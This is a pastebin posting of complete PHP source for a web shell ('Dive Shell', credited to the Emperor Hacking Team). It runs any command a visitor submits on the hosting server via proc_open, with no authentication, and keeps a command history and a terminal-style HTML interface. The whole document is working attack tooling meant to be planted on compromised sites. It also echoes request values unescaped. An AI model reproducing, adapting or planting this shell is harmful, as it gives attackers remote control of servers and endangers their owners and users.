emperor hacking shell

SUBMITTED BY: nabz

DATE: Jan. 25, 2017, 5:09 p.m.

FORMAT: Text only

SIZE: 5.3 kB

Raw Download

HITS: 160

Report
  1. <?php
  3. /*Emperor Hacking TEAM */
  5. session_start();
  7. if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
  9. $_SESSION['cwd'] = getcwd();
  11. $_SESSION['history'] = array();
  13. $_SESSION['output'] = '';
  15. }
  17. if (!empty($_REQUEST['command'])) {
  19. if (get_magic_quotes_gpc()) {
  21. $_REQUEST['command'] = stripslashes($_REQUEST['command']);
  23. }
  25. if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
  27. unset($_SESSION['history'][$i]);
  29. array_unshift($_SESSION['history'], $_REQUEST['command']);
  31. $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
  33. if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
  35. $_SESSION['cwd'] = dirname(__FILE__);
  37. } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
  39. if ($regs[1][0] == '/') {
  41. $new_dir = $regs[1];
  43. } else {
  45. $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
  47. }
  49. while (strpos($new_dir, '/./') !== false)
  51. $new_dir = str_replace('/./', '/', $new_dir);
  53. while (strpos($new_dir, '//') !== false)
  55. $new_dir = str_replace('//', '/', $new_dir);
  57. while (preg_match('|/\.\.(?!\.)|', $new_dir))
  59. $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
  61. if ($new_dir == '') $new_dir = '/';
  63. if (@chdir($new_dir)) {
  65. $_SESSION['cwd'] = $new_dir;
  67. } else {
  69. $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
  71. }
  73. } else {
  75. chdir($_SESSION['cwd']);
  77. $length = strcspn($_REQUEST['command'], " \t");
  79. $token = substr($_REQUEST['command'], 0, $length);
  81. if (isset($aliases[$token]))
  83. $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
  85. $p = proc_open($_REQUEST['command'],
  87. array(1 => array('pipe', 'w'),
  89. 2 => array('pipe', 'w')),
  91. $io);
  93. while (!feof($io[1])) {
  95. $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
  97. ENT_COMPAT, 'UTF-8');
  99. }
  101. while (!feof($io[2])) {
  103. $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
  105. ENT_COMPAT, 'UTF-8');
  107. }
  109. fclose($io[1]);
  111. fclose($io[2]);
  113. proc_close($p);
  115. }
  117. }
  119. if (empty($_SESSION['history'])) {
  121. $js_command_hist = '""';
  123. } else {
  125. $escaped = array_map('addslashes', $_SESSION['history']);
  127. $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
  129. }
  131. header('Content-Type: text/html; charset=UTF-8');
  133. echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
  135. ?>
  138. <head>
  140.   <title>Dive Shell - Emperor Hacking Team</title>
  142.   <link rel="stylesheet" href="Simshell.css" type="text/css" />
  145. <script type="text/javascript" language="JavaScript">
  147. var current_line = 0;
  149. var command_hist = new Array(<?php echo $js_command_hist ?>);
  151. var last = 0;
  153. function key(e) {
  155. if (!e) var e = window.event;
  157. if (e.keyCode == 38 && current_line < command_hist.length-1) {
  159. command_hist[current_line] = document.shell.command.value;
  161. current_line++;
  163. document.shell.command.value = command_hist[current_line];
  165. }
  167. if (e.keyCode == 40 && current_line > 0) {
  169. command_hist[current_line] = document.shell.command.value;
  171. current_line--;
  173. document.shell.command.value = command_hist[current_line];
  175. }
  177. }
  179. function init() {
  181. document.shell.setAttribute("autocomplete", "off");
  183. document.shell.output.scrollTop = document.shell.output.scrollHeight;
  185. document.shell.command.focus();
  187. }
  189. </script>
  191. </head>
  194. <body onload="init()" style="color: #00FF00; background-color: #000000">
  197. <span style="background-color: #FFFFFF">
  202. </body>
  205. </body>
  207. </html>
  212. </span>
  217. <p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
  219. <span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
  221. </font></p>
  224. <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
  226. <div style="width: 989; height: 456">
  228.   <p align="center"><b>
  230.   <font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
  232.                 onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
  234.   <input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
  236.   </font>
  238.   &nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
  240. <?php
  242. $lines = substr_count($_SESSION['output'], "\n");
  244. $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
  246. echo rtrim($padding . $_SESSION['output']);
  248. ?>
  250. </textarea> </p>
  252. <p class="prompt" align="center">
  254.   <b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b>
  256.   <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
  258. <p class="prompt" align="center">
  260.   <b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
  262. <p class="prompt" align="center">
  264.   <font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
  266. &nbsp;</font></p>
  268. </div>
  270. </form>
  274. <p class="prompt" align="center">
  276.   <b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
  278.   </b></p>
  283. </html>
comments powered by Disqus